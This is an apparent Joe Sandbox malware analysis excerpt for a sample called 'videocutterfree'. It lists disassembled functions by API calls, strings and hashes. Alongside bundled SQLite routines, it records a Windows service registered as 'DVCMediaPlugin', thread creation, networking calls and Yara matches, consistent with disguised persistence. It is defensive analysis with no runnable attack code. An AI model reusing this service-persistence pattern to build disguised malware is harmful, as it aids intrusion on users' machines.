                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                              • String ID: 2$foreign key$indexed
                                                                              • API String ID: 4126863092-702264400
                                                                              • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                              • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                              • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                              • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_stricmp
                                                                              • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                              • API String ID: 912767213-1308749736
                                                                              • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                              • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                              • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                              • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                              APIs
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                              • sqlite3_step.SQLITE3 ref: 6094B496
                                                                              • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                              • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                              • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                              • String ID:
                                                                              • API String ID: 4082478743-0
                                                                              • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                              • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                              • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                              • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                              APIs
                                                                                • Part of subcall function 00998888: __EH_prolog.LIBCMT ref: 0099888D
                                                                                • Part of subcall function 00998888: _Allocate.LIBCPMT ref: 009988E4
                                                                                • Part of subcall function 00998888: _memmove.LIBCMT ref: 0099893B
                                                                              • _memset.LIBCMT ref: 0099F6E9
                                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 0099F752
                                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 0099F75A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                              • String ID: Unknown error$invalid string position
                                                                              • API String ID: 1854462395-1837348584
                                                                              • Opcode ID: 8c4fad382a756feda71c070a2b24ba1e29bf66dde75075ee6f9be31af22abada
                                                                              • Instruction ID: 5912770e503c6099950c68044bb9aa7825018680d68c664122cb8be1fc972380
                                                                              • Opcode Fuzzy Hash: 8c4fad382a756feda71c070a2b24ba1e29bf66dde75075ee6f9be31af22abada
                                                                              • Instruction Fuzzy Hash: 4F51CF70208341DFEB14CF69C8A0B2FFBE8AB98314F50092DF49297692D775E5488B52
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                              • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: BINARY$INTEGER
                                                                              • API String ID: 317512412-1676293250
                                                                              APIs
                                                                              • CreateServiceA.ADVAPI32 ref: 0040B643
                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040B952
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseCreateHandle
                                                                              • String ID: -Nam$e "r
                                                                              • API String ID: 1873643653-692479093
                                                                              APIs
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                              • sqlite3_step.SQLITE3 ref: 6096A435
                                                                              • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 247099642-0
                                                                              APIs
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                              • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                              • String ID:
                                                                              • API String ID: 326482775-0
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A3C46,?,?,?,00000001), ref: 009A82DD
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A82E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              APIs
                                                                                • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1465156292-0
                                                                              APIs
                                                                              • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00402520
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CtrlDispatcherServiceStart
                                                                              • String ID:
                                                                              • API String ID: 3789849863-0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009924E6
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009924FC
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0099250E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0099256D
                                                                              • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 0099257F
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 00992599
                                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 009925A2
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009925F0
                                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 0099262F
                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0099268E
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00992699
                                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 009926AD
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 009926BD
                                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 009926C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                              • String ID:
                                                                              • API String ID: 1213838671-0
                                                                              APIs
                                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(DVCMediaPlugin,0040235E), ref: 004023C1
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
                                                                              • GetLastError.KERNEL32 ref: 00402422
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                              • GetLastError.KERNEL32 ref: 00402450
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
                                                                              • CreateThread.KERNEL32(00000000,00000000,VWhtp@,00000000,00000000,00000000), ref: 0040248C
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                              • CloseHandle.KERNEL32 ref: 004024A1
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                              • String ID: DVCMediaPlugin$VWhtp@
                                                                              • API String ID: 3346042915-746469874
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994608
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                              • htons.WS2_32(?), ref: 00994669
                                                                              • htonl.WS2_32(?), ref: 0099468C
                                                                              • htonl.WS2_32(00000000), ref: 00994693
• htons.WS2_32(00000000), ref: 00994747
• _sprintf.LIBCMT ref: 0099475D
  • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
• htons.WS2_32(?), ref: 009946B0
  • Part of subcall function 009984E6: __EH_prolog.LIBCMT ref: 009984EB
  • Part of subcall function 009984E6: RtlEnterCriticalSection.NTDLL(00000020), ref: 00998566
  • Part of subcall function 009984E6: RtlLeaveCriticalSection.NTDLL(00000020), ref: 00998584
  • Part of subcall function 00991BA7: __EH_prolog.LIBCMT ref: 00991BAC
  • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991BBC
  • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991BEA
  • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991C13
  • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991C56
  • Part of subcall function 0099CCA2: __EH_prolog.LIBCMT ref: 0099CCA7
• htonl.WS2_32(?), ref: 0099497C
• htonl.WS2_32(00000000), ref: 00994983
• htonl.WS2_32(00000000), ref: 009949C8
• htonl.WS2_32(00000000), ref: 009949CF
• htons.WS2_32(?), ref: 009949EF
• htons.WS2_32(?), ref: 009949F9
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
• String ID:
• API String ID: 1645262487-0
APIs
• RtlDecodePointer.NTDLL(?), ref: 009A70EA
• _free.LIBCMT ref: 009A7103
  • Part of subcall function 009A1D24: HeapFree.KERNEL32(00000000,00000000,?,009A4A82,00000000,00000104,75920A60), ref: 009A1D38
  • Part of subcall function 009A1D24: GetLastError.KERNEL32(00000000,?,009A4A82,00000000,00000104,75920A60), ref: 009A1D4A
• _free.LIBCMT ref: 009A7116
• _free.LIBCMT ref: 009A7134
• _free.LIBCMT ref: 009A7146
• _free.LIBCMT ref: 009A7157
• _free.LIBCMT ref: 009A7162
• _free.LIBCMT ref: 009A7186
• RtlEncodePointer.NTDLL(00B19C48), ref: 009A718D
• _free.LIBCMT ref: 009A71A2
• _free.LIBCMT ref: 009A71B8
• _free.LIBCMT ref: 009A71E0
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
• String ID:
• API String ID: 3064303923-0
APIs
  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
• sqlite3_malloc.SQLITE3 ref: 60960384
• sqlite3_free.SQLITE3 ref: 609605EA
• sqlite3_result_error_code.SQLITE3 ref: 6096060D
• sqlite3_free.SQLITE3 ref: 60960618
• sqlite3_result_text.SQLITE3 ref: 6096063C
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
• String ID: offsets
• API String ID: 463808202-2642679573
APIs
• sqlite3_value_text.SQLITE3 ref: 6091A3C1
• sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
• sqlite3_value_text.SQLITE3 ref: 6091A3E4
• sqlite3_value_bytes.SQLITE3 ref: 6091A416
• sqlite3_value_text.SQLITE3 ref: 6091A424
• sqlite3_value_bytes.SQLITE3 ref: 6091A43A
• sqlite3_result_text.SQLITE3 ref: 6091A5A2
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
• String ID:
• API String ID: 2903785150-0
APIs
• __EH_prolog.LIBCMT ref: 00993428
• GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0099346B
• GetProcAddress.KERNEL32(00000000), ref: 00993472
• GetLastError.KERNEL32 ref: 00993486
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009934D7
• RtlEnterCriticalSection.NTDLL(00000018), ref: 009934ED
• RtlLeaveCriticalSection.NTDLL(00000018), ref: 00993518
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
• String ID: CancelIoEx$KERNEL32
• API String ID: 2902213904-434325024
APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 0040560A
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405622
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405633
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405640
Strings
Memory Dump Source
• Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID:
• String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
• API String ID: 0-780898
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID:
• String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
• API String ID: 0-2604012851
APIs
